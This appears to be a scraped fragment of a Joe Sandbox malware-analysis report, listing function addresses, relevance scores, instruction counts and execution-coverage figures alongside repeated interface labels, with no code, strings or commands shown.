Function 04BBB7E8 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC4D7B Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC4EE4 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC4ECD Relevance: .0, Instructions: 32COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008AD7F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008AD800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008AB159 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008A5E75 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008A49D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC1450 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC095B Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008ADA40 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC0960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008ADA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC5CD3 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC12A6 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC08AB Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC5C30 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC08B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008AB358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC2D94 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0084D3D8 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0085D01C Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0085D005 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0084D3D3 Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0084D731 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0084D730 Relevance: .0, Instructions: 36COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC0E70 Relevance: .3, Instructions: 312COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06CC0A38 Relevance: .3, Instructions: 312COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BBE7D8 Relevance: .3, Instructions: 312COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BBE3A0 Relevance: .3, Instructions: 312COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BBEC10 Relevance: .3, Instructions: 312COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BB5E18 Relevance: .3, Instructions: 282COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 008AF2E4 Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BB5E28 Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BBE7CB Relevance: .1, Instructions: 132COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04BBE39B Relevance: .1, Instructions: 128COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 13.1% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 1.2% |
Total number of Nodes: | 253 |
Total number of Limit Nodes: | 30 |
Graph
Function 06932758 Relevance: 9.0, Strings: 6, Instructions: 1532COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693B348 Relevance: 8.3, Strings: 6, Instructions: 769COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06937E90 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069356A8 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692C628 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06936700 Relevance: .8, Instructions: 809COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693ADE0 Relevance: 12.9, Strings: 10, Instructions: 389COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06939260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693D068 Relevance: 4.6, Strings: 3, Instructions: 801COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B4690 Relevance: 4.1, Strings: 3, Instructions: 341COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06934C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1DC0 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1DB0 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06939253 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06934C69 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02A6EEA0 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06925FD3 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06925FD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06929AB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06929AF0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692D6AB Relevance: 1.6, APIs: 1, Instructions: 67COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06929ED0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06929ED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692D5E8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02A68038 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02A68040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692B098 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02A6EF70 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692B3A9 Relevance: 1.6, APIs: 1, Instructions: 51comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06923864 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06924F2B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692B3B8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06929B0C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0692B961 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693DBF0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693DBDD Relevance: 1.4, Strings: 1, Instructions: 116COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069321BD Relevance: 1.4, Strings: 1, Instructions: 106COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069321D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1219 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069383E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06934B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693C2A8 Relevance: .6, Instructions: 633COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B4434 Relevance: .4, Instructions: 407COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693B343 Relevance: .3, Instructions: 291COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06936300 Relevance: .2, Instructions: 229COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069343B3 Relevance: .2, Instructions: 220COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069343C0 Relevance: .2, Instructions: 218COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069346CC Relevance: .2, Instructions: 214COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069346E0 Relevance: .2, Instructions: 210COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693F031 Relevance: .2, Instructions: 204COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693F040 Relevance: .2, Instructions: 201COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1A98 Relevance: .2, Instructions: 196COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693FCD0 Relevance: .2, Instructions: 171COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693FA70 Relevance: .2, Instructions: 170COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693FA80 Relevance: .2, Instructions: 163COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06935530 Relevance: .1, Instructions: 126COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693DA90 Relevance: .1, Instructions: 100COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1325 Relevance: .1, Instructions: 98COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1330 Relevance: .1, Instructions: 96COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06932081 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06932090 Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693A418 Relevance: .1, Instructions: 86COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B4ED9 Relevance: .1, Instructions: 81COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06933FB9 Relevance: .1, Instructions: 80COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06933FC8 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B4EE8 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D005 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D1F8 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D3A8 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B4A04 Relevance: .1, Instructions: 71COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B43EC Relevance: .1, Instructions: 71COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D118 Relevance: .1, Instructions: 71COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1050 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06936E28 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B28A8 Relevance: .1, Instructions: 63COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069340D8 Relevance: .1, Instructions: 59COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B28B8 Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B0BCC Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1111 Relevance: .1, Instructions: 55COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06934310 Relevance: .1, Instructions: 54COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693F2B0 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06933D93 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06933578 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D1F3 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D3A3 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069340C9 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06933D98 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E3D113 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06934320 Relevance: .1, Instructions: 51COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693F2C0 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3EC8 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693FCC1 Relevance: .0, Instructions: 48COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3104 Relevance: .0, Instructions: 47COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693A428 Relevance: .0, Instructions: 46COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693C900 Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1041 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1A88 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B1BB8 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3E79 Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B2D79 Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3E88 Relevance: .0, Instructions: 27COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06936580 Relevance: .0, Instructions: 24COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06936590 Relevance: .0, Instructions: 22COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B11C0 Relevance: .0, Instructions: 22COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B11D0 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3C00 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B2540 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B3C10 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B2E57 Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B278B Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B287F Relevance: .0, Instructions: 10COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B2E20 Relevance: .0, Instructions: 9COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 060B0F20 Relevance: .0, Instructions: 9COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069377B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069371B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 069384E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693ADD0 Relevance: 5.2, Strings: 4, Instructions: 172COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06938900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0693AE5C Relevance: 5.1, Strings: 4, Instructions: 117COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 10.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 150 |
Total number of Limit Nodes: | 15 |
Graph
Function 00D2D7F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D2D800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D2B159 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D25E75 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D249D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC1450 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D2DA40 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC0960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC095B Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D2DA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC12A7 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC08AB Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC4FE8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC08B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06AC3264 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00D2B358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0092D1FC Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0093D01C Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0093D006 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0092D1F7 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 12% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 20 |
Total number of Limit Nodes: | 4 |
Graph
Function 07083578 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07087E90 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070856A8 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
